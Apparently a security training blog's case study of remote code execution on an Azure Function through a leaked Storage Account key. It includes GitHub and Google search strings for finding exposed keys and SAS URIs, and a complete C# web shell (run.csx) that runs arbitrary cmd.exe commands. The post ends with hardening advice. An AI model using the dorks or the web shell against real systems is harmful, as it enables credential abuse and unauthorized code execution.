In this blog, Sunil Yadav, our lead trainer for “Advanced Web Hacking” training class, will discuss a case study of Remote code execution via Azure Storage when the Azure Function deployment is configured to run from Storage Account using WEBSITE_CONTENTSHARE app setting.
TL;DR
- Access Leaked Storage Account’s Access Key
- Connect to Storage Account and download Blobs, Files, etc.
- The files contain code to an Azure Function
- Create a new HTTP Trigger with a web-shell
- Upload the malicious file to Azure files as a new Trigger and run OS commands.
Marketing
You can find more such scenarios in our Hacking and Securing Cloud Training.
Get in touch if you would like our consultancy service to audit/harden your cloud infrastructure.
Azure Storage Account Access Keys and SAS URIs
An Azure storage account uses credentials containing an account name and a key. The key is auto-generated when the storage account is created and serves as a password to connect to Azure Storage. The Storage Access keys, by default, has all permissions and is similar to the root password of your storage account.
An Azure storage account contains Blobs, Queues, Tables, and files (shared folder or drive) as storage types and be accessed via an API.
Additionally, Azure provides Shared Access Signature (SAS) URI for granting fine-grained access to storage objects. SAS URI, one can control what data to expose, and what permissions to put on those objects (SignedPermission), and for how long the SAS URI is valid(SignedExpiry), with other parameters as mentioned below:
https://<accountname>.<service>.core.windows.net/?sv=2018-03-28&ss=bfqt&srt=sco&sp=rwdlacup&se=2019-09-30T17:13:23Z&st=2019-09-30T09:13:23Z&sip=88.208.222.83&spr=https&sig=LCoN4d%2B%2BZSzPtPO71fMS34k%2FhLf2Wjen9pzhlAGFfPU%3D
More details: https://docs.microsoft.com/en-us/rest/api/storageservices/create-account-sas
Finding Access Keys and SAS URIs
Access keys and SAS URIs are critical, and it is essential to protect them from unauthorized disclosure. However, there are instances wherein this information is available in public sources. We have created a list of Parameters that can be helpful to locate Account Name, keys, and SAS URIs.
Connection String (Account name and key)
https://github.com/search?l=XML&q=DefaultEndpointsProtocol%3Dhttps&type=...
https://github.com/search?q=StorageConnectStringBlob&type=Code
https://github.com/search?q=local.settings.json&type=Code
A good multi-site search interface https://tools.redhuntlabs.com/online-ide-and-paste-search-tool.html which can also be helpful to search Access keys and SAS URIs.
Shared Access Signature - SAS URI
Github
https://github.com/search?q=rwdlacup&type=Code
https://www.google.com/search?q=site:*.core.windows.net%20inurl:sig
https://www.google.com/search?q=site:*.{customdomain}.com%20inurl:sig
Additionally, these details can also be found within these files
- web.config
- local.settings.json
- app.config
Consider the following SAS URL. The signature validity interval (se parameter) is set too high, and it has all available privileges on the file share object. If a malicious actor found out this URL, then he can read, update, and delete all the objects from the storage account.
https://storageaccount.file.core.windows.net/XYZ-538d26??sv=2017-04-17&ss=bfqt&srt=sco&sp=rwdlacup&st=2019-09-30T19%3A43%3A56Z&se=2039-10-01T19%3A43%3A00Z&sig=WRo1i2cchlfVBCa%2FfwCqx3i%2BO64HSjbl%2F…..
Backdooring Azure Function Deployment
In one of our recent engagements, during the OSINT phase of the assessment, we identified the Azure Storage connection string (Azure AccountName and AccountKey) on publicly hosted Github repository leaking Azure Storage Connection in local.settings.json file as shown in Figure below:
The next step was to validate the keys and identify the access.
To do this, we used Azure Storage Explorer (https://azure.microsoft.com/en-in/features/storage-explorer/) to connect to the storage account using a connection string.
Surprisingly, the key worked, and it had access to Azure Blobs, Files, Queues, and Tables as a root user to the storage account.
We further investigated the storage objects, and the File Shares directory contained the following structure which caught our attention.
- ASP.NET
- data
- LogFiles
- root
- site
We got access to the source code (.csx - CSharp scripts) of Azure functions for HTTP and Blob Triggers inside site\wwwroot directory as shown below:
So far so good. Let’s explore further possibilities.
Let’s download the BLOB container (azure-webjobs-secrets) using Azure CLI command.
We found out the URL to an HTTP Trigger in the "host.json" file from the azure-webjobs-secrets container. The HTTP endpoint URL was active, and we could access it as the Authorization level was set to Anonymous.
Now that we had permissions to read/write objects It was possible to overwrite the existing functions. However, as it was a production instance, we decided not to overwrite or replace the existing ones, but instead, we chose a non-destructive approach by uploading a simple hello world HTTP Trigger in a sub-folder as shown below.
Surprisingly, the newly uploaded function was immediately up and running.
This confirmed that the Azure function code & configuration are picked up from the File Share.
Now let’s try to get code execution, In order to achieve code execution, we have updated the “run.csx” with a webshell code and uploaded it back on the HellowWorldTrigger.
Web-shell (run.csx)
#r "Newtonsoft.Json" using System.Net; using Microsoft.AspNetCore.Mvc; using Microsoft.Extensions.Primitives; using Newtonsoft.Json; using System; using System.IO; using System.Diagnostics; public static async Task<IActionResult> Run(HttpRequest req, ILogger log) { log.LogInformation("C# HTTP trigger function processed a request."); string cmd = req.Query["cmd"]; string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); dynamic data = JsonConvert.DeserializeObject(requestBody); cmd = cmd ?? data?.cmd; return cmd != null ? (ActionResult)new OkObjectResult(ExcuteCmd(cmd)) : new BadRequestObjectResult("Please pass a name on the query string or in the request body"); } public static string ExcuteCmd(string arg) { ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "cmd.exe"; psi.Arguments = "/c " + arg; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); stmrdr.Close(); return s; }
We can now access the web shell and execute arbitrary commands on the Azure Container.
So in simple steps by leveraging public information, we were able to obtain code execution in the environment of the Azure function. Once we have explored the damage potential, let's look at how can we protect ourselves from such scenarios.
Securing access to storage accounts
- Regenerate storage account keys on a regular basis.
- Shared Access Signatures and Stored Access Policies to protect your data.
- Grant access to containers and blobs for more fine-grained control of access to your blobs, via a Shared Access Signature (SAS).
- Limit access to a specific IP address (or range of IP addresses)
- Attach expiry to SAS URIs
Read More: https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide
References:
https://docs.microsoft.com/en-us/azure/azure-functions/functions-create-first-azure-function
https://docs.microsoft.com/en-us/azure/azure-functions/functions-deployment-technologies